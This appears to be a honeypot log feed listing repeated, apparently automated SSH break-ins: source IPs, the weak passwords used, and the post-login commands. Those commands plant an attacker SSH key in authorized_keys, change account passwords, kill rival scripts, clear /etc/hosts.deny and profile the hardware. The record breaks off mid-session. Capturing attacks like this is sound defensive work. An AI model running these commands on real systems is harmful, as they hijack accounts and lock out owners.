$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_35 (101.79.167.192) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-06-03 18:01 EDT Β· as ubuntu/123456!
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456!\nlxT0lXxIqmZi\nlxT0lXxIqmZi"|passwd|bash
$ Enter new UNIX password:
$ echo "123456!\nlxT0lXxIqmZi\nlxT0lXxIqmZi\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_2 (124.193.81.23) β€” Chaowai, China Β· 1 session Β· 20 cmds
2026-06-03 17:45 EDT Β· as juan/123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nDeo2DDEGIkv3\nDeo2DDEGIkv3"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nDeo2DDEGIkv3\nDeo2DDEGIkv3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lotus (103.186.132.188) β€” Pune, India Β· 1 session Β· 20 cmds
2026-06-03 17:38 EDT Β· as bitrix/bitrix321
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "bitrix321\nqbZpgXxS59V0\nqbZpgXxS59V0"|passwd|bash
$ Enter new UNIX password:
$ echo "bitrix321\nqbZpgXxS59V0\nqbZpgXxS59V0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_2 (23.227.147.163) β€” Piscataway, United States Β· 1 session Β· 20 cmds
2026-06-03 16:49 EDT Β· as ftp02/ftp02
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ftp02\nW5rqMUWUeh57\nW5rqMUWUeh57"|passwd|bash
$ Enter new UNIX password:
$ echo "ftp02\nW5rqMUWUeh57\nW5rqMUWUeh57\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shogun_root_3 (168.138.213.115) β€” Tokyo, Japan Β· 1 session Β· 19 cmds
2026-06-03 16:26 EDT Β· as root/Password@123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:jRvZM0LjtUHf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_10 (58.224.62.29) β€” Yangcheon-gu, South Korea Β· 1 session Β· 19 cmds
2026-06-03 16:24 EDT Β· as root/Password@123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Tz9HtbflOCJX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_12 (14.103.127.32) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-06-03 13:55 EDT Β· as root/admin88888
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:wrXWcLedjwzb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_36 (107.150.119.80) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-06-03 13:06 EDT Β· as admin/admin1234567, vendas/1234
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "admin1234567\nH4q0nloLHP45\nH4q0nloLHP45"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "admin1234567\nH4q0nloLHP45\nH4q0nloLHP45\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1234\n5liBd0EzBrUM\n5liBd0EzBrUM"|passwd|bash
$ echo "1234\n5liBd0EzBrUM\n5liBd0EzBrUM\n"|passwd
🎭 specter_root_39 (79.117.115.43) β€” Madrid, Spain Β· 2 sessions Β· 40 cmds
2026-06-03 13:10 EDT Β· as admin/admin1234567, vendas/1234
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\n6yVviio3fw6a\n6yVviio3fw6a"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1234\n6yVviio3fw6a\n6yVviio3fw6a\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "admin1234567\nxOQkphy7ZjQj\nxOQkphy7ZjQj"|passwd|bash
$ echo "admin1234567\nxOQkphy7ZjQj\nxOQkphy7ZjQj\n"|passwd
🎭 silk_root_13 (120.48.178.72) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-03 12:36 EDT Β· as teste/12345
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345\n6Xq9oqLcjfJw\n6Xq9oqLcjfJw"|passwd|bash
$ Enter new UNIX password:
$ echo "12345\n6Xq9oqLcjfJw\n6Xq9oqLcjfJw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_14 (219.128.75.174) β€” Guangzhou, China Β· 1 session Β· 19 cmds
2026-06-03 12:26 EDT Β· as root/testtesttest
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:hKdXxDXT9QcL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_2 (101.36.116.204) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-06-03 12:11 EDT Β· as minecraft/P@ssw0rd
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "P@ssw0rd\n6F06WJsp25JM\n6F06WJsp25JM"|passwd|bash
$ Enter new UNIX password:
$ echo "P@ssw0rd\n6F06WJsp25JM\n6F06WJsp25JM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_10 (118.145.238.60) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-06-03 12:04 EDT Β· as root/Welcome@1
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:m9rEIDviH8K3"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_27 (35.222.117.243) β€” Council Bluffs, United States Β· 1 session Β· 20 cmds
2026-06-03 08:00 EDT Β· as serge/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nC646iOSeyXpg\nC646iOSeyXpg"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nC646iOSeyXpg\nC646iOSeyXpg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_7 (185.239.84.249) β€” Hong Kong, Hong Kong Β· 6 sessions Β· 116 cmds
2026-05-10 23:18 EDT Β· as finland/123456, im/im123, root/1337
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
